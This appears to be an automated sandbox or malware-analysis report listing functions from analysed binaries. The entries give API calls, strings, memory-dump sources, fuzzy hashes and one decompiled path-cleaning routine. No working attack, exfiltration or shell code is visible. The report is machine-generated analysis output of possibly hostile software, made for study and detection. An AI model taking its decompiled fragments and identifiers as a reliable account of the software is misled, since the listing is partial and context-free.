                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,?), ref: 6E65B20F
                                                                                                                                                    • PathFindExtensionW.SHLWAPI(?), ref: 6E65B229
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExtensionFileFindModuleNamePath
                                                                                                                                                    • String ID: .CHM$.HLP$.INI
                                                                                                                                                    • API String ID: 2295281026-4017452060
                                                                                                                                                    • Opcode ID: 507ac96513f2319170aa54d29bc7662988c735a5f6898e38438752515bd81c74
                                                                                                                                                    • Instruction ID: ebac0821458742a90cef5a54bb3cd0bc729cd3c466a17fd4b36082c8ec6fa459
                                                                                                                                                    • Opcode Fuzzy Hash: 507ac96513f2319170aa54d29bc7662988c735a5f6898e38438752515bd81c74
                                                                                                                                                    • Instruction Fuzzy Hash: 24418AB1A0070A9AEB60DFF4CC54AABB3FCAF45314F004C6AA556D6784EF70E594CB24
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64ED20, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64EDAE
                                                                                                                                                      • Part of subcall function 6E628FF0: _DebugHeapAllocator.LIBCPMTD ref: 6E629045
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap
                                                                                                                                                    • String ID: dn
                                                                                                                                                    • API String ID: 571936431-524644630
                                                                                                                                                    • Opcode ID: ca256989f15b62ed4abe49f82ed1e3fe11cbae9770760299c06ac4ebec9ac893
                                                                                                                                                    • Instruction ID: 99074da366e930c9358833c5ddf61ca4d902f5bb5bde82df8dd9b15f7b435632
                                                                                                                                                    • Opcode Fuzzy Hash: ca256989f15b62ed4abe49f82ed1e3fe11cbae9770760299c06ac4ebec9ac893
                                                                                                                                                    • Instruction Fuzzy Hash: B7510970904109DFCB14DFE8C951AEEBBB8FF55358F508A28E425AB2D0DB706E05CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64B520, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 128COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • QueryInformationJobObject.KERNEL32 ref: 6E64B5A8
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,3920FDCC), ref: 6E64B5B2
                                                                                                                                                      • Part of subcall function 6E66F4CD: _free.LIBCMT ref: 6E66F4E0
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    • Concurrency::details::_Condition_variable::_Condition_variable.LIBCMTD ref: 6E64B624
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\UIATools.cpp, xrefs: 6E64B5C7
                                                                                                                                                    • 0, xrefs: 6E64B562
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Base::Concurrency::details::Concurrency::details::_Condition_variableCondition_variable::_ContextErrorIdentityInformationLastObjectQueryQueueWork_free
                                                                                                                                                    • String ID: 0$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\UIATools.cpp
                                                                                                                                                    • API String ID: 3571973630-1420485733
                                                                                                                                                    • Opcode ID: 01c0674d06a85f18c667f78bc552b7804422b1668c72665ba3e9173f3c74c03a
                                                                                                                                                    • Instruction ID: 5d2f87d2e39e563a1fcc595f5b66548a981fb10a7bf56ab04584d1597edfe525
                                                                                                                                                    • Opcode Fuzzy Hash: 01c0674d06a85f18c667f78bc552b7804422b1668c72665ba3e9173f3c74c03a
                                                                                                                                                    • Instruction Fuzzy Hash: 2951E7B1D10209DFCB04CFE4D990BEEBBB9BF49314F108519E515AB284EB756A04CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62ACF0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 6E62ADF0
                                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 6E62ADFF
                                                                                                                                                      • Part of subcall function 6E62A6B0: UuidCreate.RPCRT4(?), ref: 6E62A6F2
                                                                                                                                                      • Part of subcall function 6E62A6B0: UuidToStringW.RPCRT4(?,00000000), ref: 6E62A710
                                                                                                                                                      • Part of subcall function 6E62A6B0: RpcStringFreeW.RPCRT4(00000000), ref: 6E62A735
                                                                                                                                                      • Part of subcall function 6E62A6B0: _DebugHeapAllocator.LIBCPMTD ref: 6E62A74E
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62AE3A
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62AE9C
                                                                                                                                                      • Part of subcall function 6E626420: _DebugHeapAllocator.LIBCPMTD ref: 6E62642E
                                                                                                                                                    Strings
                                                                                                                                                    • {"ignoreFailure": false,"uiDisabled" : false,"uiHidden" : false,"uiUnSelected" : false}, xrefs: 6E62AE91
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeapProcessorVirtual$Concurrency::RootRoot::StringUuid$Base::Concurrency::details::ContextCreateFreeIdentityQueueWork
                                                                                                                                                    • String ID: {"ignoreFailure": false,"uiDisabled" : false,"uiHidden" : false,"uiUnSelected" : false}
                                                                                                                                                    • API String ID: 1953270982-1462386811
                                                                                                                                                    • Opcode ID: 768b880a78b9b978db1789bbece4a1d77f45dc6116a6ef4abc4b0b340c3d958e
                                                                                                                                                    • Instruction ID: 1eef51a49d9354d959b496c4a0ed91110c60395a4ef4387305ad8b0bfdfbb195
                                                                                                                                                    • Opcode Fuzzy Hash: 768b880a78b9b978db1789bbece4a1d77f45dc6116a6ef4abc4b0b340c3d958e
                                                                                                                                                    • Instruction Fuzzy Hash: B0510AB090519ADFDF08DFD8C9647EEBBB5BF41308F144998C0522B382CB755A04CBA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E633C10, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: allocator$task
                                                                                                                                                    • String ID: |4cn$|4cn
                                                                                                                                                    • API String ID: 2682888079-2880040493
                                                                                                                                                    • Opcode ID: c36644b73015345f4d63f89cc28c04fd2176e1b2112f87cc8195a3f59fd22c5a
                                                                                                                                                    • Instruction ID: 94f11cb0af3b56ce9e7ab76d67d5272d39bd2bbdcea5d09775fd7e10639d68f1
                                                                                                                                                    • Opcode Fuzzy Hash: c36644b73015345f4d63f89cc28c04fd2176e1b2112f87cc8195a3f59fd22c5a
                                                                                                                                                    • Instruction Fuzzy Hash: 99411DB5D40118ABCB08DFD8E9909DEB7B9FF48314F609529F825A7340DB34AA05CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E636A40, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$char_traits
                                                                                                                                                    • String ID: [json.exception.
                                                                                                                                                    • API String ID: 1455298312-791563284
                                                                                                                                                    • Opcode ID: bd821348e63e7fc9785525dfa16fe10141867876464db9b60e1d87803d277c12
                                                                                                                                                    • Instruction ID: 94ef57518c47c3ce23df080c3815fd508321da8aee245b1bebba0cd40bd62fb6
                                                                                                                                                    • Opcode Fuzzy Hash: bd821348e63e7fc9785525dfa16fe10141867876464db9b60e1d87803d277c12
                                                                                                                                                    • Instruction Fuzzy Hash: 9B41F8B5D00258EFDB14CFE8D940BDDBBB8BB58304F2086ADE419AB241EB355A44DF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E623FF0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E624034
                                                                                                                                                      • Part of subcall function 6E621390: _DebugHeapAllocator.LIBCPMTD ref: 6E6213CB
                                                                                                                                                      • Part of subcall function 6E621390: std::ios_base::good.LIBCPMTD ref: 6E6213E3
                                                                                                                                                      • Part of subcall function 6E621390: _DebugHeapAllocator.LIBCPMTD ref: 6E621457
                                                                                                                                                      • Part of subcall function 6E621390: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E6214A5
                                                                                                                                                      • Part of subcall function 6E621390: _DebugHeapAllocator.LIBCPMTD ref: 6E6214AE
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E62404F
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6240A1
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWorkstd::ios_base::good
                                                                                                                                                    • String ID: Action canceled: %s$cond_ca%d
                                                                                                                                                    • API String ID: 1085074254-4002317772
                                                                                                                                                    • Opcode ID: 2b1c4ada3f97bd1138cf220d4be34e174bfff1a14029ba24469c8e75fdada0dc
                                                                                                                                                    • Instruction ID: ada2b5c9958020790f77829db50fe356e5a2573def721f7858a877a63b396a7c
                                                                                                                                                    • Opcode Fuzzy Hash: 2b1c4ada3f97bd1138cf220d4be34e174bfff1a14029ba24469c8e75fdada0dc
                                                                                                                                                    • Instruction Fuzzy Hash: C6313C71D10209DFCB04DFE8D941AEEBBB8BF19318F508529E411AB280DB756A04CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406064, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E00406064(WCHAR* _a4) {
				signed int _t5;
				signed int _t8;
				WCHAR* _t20;
				WCHAR* _t21;
				WCHAR* _t22;

				_t21 = _a4;
				if( *_t21 == 0x5c && _t21[1] == 0x5c && _t21[2] == 0x3f && _t21[3] == 0x5c) {
					_t21 =  &(_t21[4]);
				}
				if( *_t21 != 0 && E00405D51(_t21) != 0) {
					_t21 =  &(_t21[2]);
				}
				_t5 =  *_t21 & 0x0000ffff;
				_t22 = _t21;
				_t20 = _t21;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405D32(L"*?|<>/\":", _t5))) == 0) {
							E00405E38(_t20, _t21, CharNextW(_t21) - _t21 >> 1);
							_t20 = CharNextW(_t20);
						}
						_t21 = CharNextW(_t21);
						_t5 =  *_t21 & 0x0000ffff;
					} while (_t5 != 0);
				}
				 *_t20 = 0;
				while(1) {
					_push(_t20);
					_push(_t22);
					_t20 = CharPrevW();
					_t8 =  *_t20 & 0x0000ffff;
					if(_t8 != 0x20 && _t8 != 0x5c) {
						break;
					}
					_t8 = 0;
					 *_t20 = 0;
					if(_t22 < _t20) {
						continue;
					}
					break;
				}
				return _t8;
			}








                                                                                                                                                    0x00406066
                                                                                                                                                    0x0040606f
                                                                                                                                                    0x00406086
                                                                                                                                                    0x00406086
                                                                                                                                                    0x0040608d
                                                                                                                                                    0x00406099
                                                                                                                                                    0x00406099
                                                                                                                                                    0x0040609c
                                                                                                                                                    0x0040609f
                                                                                                                                                    0x004060a1
                                                                                                                                                    0x004060a6
                                                                                                                                                    0x004060af
                                                                                                                                                    0x004060b3
                                                                                                                                                    0x004060d0
                                                                                                                                                    0x004060d8
                                                                                                                                                    0x004060d8
                                                                                                                                                    0x004060dd
                                                                                                                                                    0x004060df
                                                                                                                                                    0x004060e2
                                                                                                                                                    0x004060e7
                                                                                                                                                    0x004060ea
                                                                                                                                                    0x004060ed
                                                                                                                                                    0x004060ed
                                                                                                                                                    0x004060ee
                                                                                                                                                    0x004060f5
                                                                                                                                                    0x004060f7
                                                                                                                                                    0x004060fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406104
                                                                                                                                                    0x00406106
                                                                                                                                                    0x0040610b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040610b
                                                                                                                                                    0x00406110

                                                                                                                                                    APIs
                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                    • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                    • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                                    • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                    • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                    • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                    • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E636FB0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B3A
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B46
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B52
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B61
                                                                                                                                                    • task.LIBCPMTD ref: 6E63702F
                                                                                                                                                    • task.LIBCPMTD ref: 6E63703B
                                                                                                                                                    • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E637050
                                                                                                                                                    • task.LIBCPMTD ref: 6E637068
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                                    • String ID: invalid_iterator
                                                                                                                                                    • API String ID: 2520070614-2508626007
                                                                                                                                                    • Opcode ID: fca870f8317c6c8960df0bfd42de50ec6f589023ef52248c40d5e1f9bcc5f94e
                                                                                                                                                    • Instruction ID: f44b452d6eb2c45c3e5f5e3f65105f2d6c795edc298f879834cade964d5bcf83
                                                                                                                                                    • Opcode Fuzzy Hash: fca870f8317c6c8960df0bfd42de50ec6f589023ef52248c40d5e1f9bcc5f94e
                                                                                                                                                    • Instruction Fuzzy Hash: F621E975D0425CEBCB04DFE8DC50BDEBBB8FB58314F108629E416AB284EB746A05DB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E637200, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B3A
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B46
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B52
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B61
                                                                                                                                                    • task.LIBCPMTD ref: 6E63727F
                                                                                                                                                    • task.LIBCPMTD ref: 6E63728B
                                                                                                                                                    • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E6372A0
                                                                                                                                                    • task.LIBCPMTD ref: 6E6372B8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                                    • String ID: out_of_range
                                                                                                                                                    • API String ID: 2520070614-3053435996
                                                                                                                                                    • Opcode ID: 543a311a44ad4ec493d4951f6ed01f6fb574664cb12fdc944170081b0347cc30
                                                                                                                                                    • Instruction ID: 4d8659a76cf491220bef33d9a33a037b37399938e8e127854a0a2099c07852ad
                                                                                                                                                    • Opcode Fuzzy Hash: 543a311a44ad4ec493d4951f6ed01f6fb574664cb12fdc944170081b0347cc30
                                                                                                                                                    • Instruction Fuzzy Hash: A521197590024CEBCB04DFE8D850BDEBBB8FB58314F108629E416AB284EB706A05DB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E637310, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B3A
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B46
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B52
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B61
                                                                                                                                                    • task.LIBCPMTD ref: 6E63738F
                                                                                                                                                    • task.LIBCPMTD ref: 6E63739B
                                                                                                                                                    • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E6373B0
                                                                                                                                                    • task.LIBCPMTD ref: 6E6373C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                                    • String ID: other_error
                                                                                                                                                    • API String ID: 2520070614-896093151
                                                                                                                                                    • Opcode ID: 51c3c156aa34c446eca13a0c25d4aff9d666db3a3ded3ffcbd565fb5ee6cee8b
                                                                                                                                                    • Instruction ID: f75a0aecdc8ac5d75d521d3ab63fbe6bc53fe20d0c43d4996eeb6506cfd50dbf
                                                                                                                                                    • Opcode Fuzzy Hash: 51c3c156aa34c446eca13a0c25d4aff9d666db3a3ded3ffcbd565fb5ee6cee8b
                                                                                                                                                    • Instruction Fuzzy Hash: 5621197590024CEBCB04DFE8D850BDEBBB8FB58314F108629E416AB284EB306A05DB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6370F0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B3A
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B46
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B52
                                                                                                                                                      • Part of subcall function 6E636A40: task.LIBCPMTD ref: 6E636B61
                                                                                                                                                    • task.LIBCPMTD ref: 6E63716F
                                                                                                                                                    • task.LIBCPMTD ref: 6E63717B
                                                                                                                                                    • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E637190
                                                                                                                                                    • task.LIBCPMTD ref: 6E6371A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                                    • String ID: type_error
                                                                                                                                                    • API String ID: 2520070614-1406221190
                                                                                                                                                    • Opcode ID: fdba5b31817cc595ecebd06c3cf69458d25f6197cbfdaf619f05b4958db83c17
                                                                                                                                                    • Instruction ID: 8cb53f6383d799a03cbd59177351ce4cb24d8ce0b6abbf9704a3ae0323bf7774
                                                                                                                                                    • Opcode Fuzzy Hash: fdba5b31817cc595ecebd06c3cf69458d25f6197cbfdaf619f05b4958db83c17
                                                                                                                                                    • Instruction Fuzzy Hash: EC211B7590024CEBCB04DFD4DC50BDEBBB8FF58314F108629E416AB284EB306A05DB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E628130, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registrylibraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
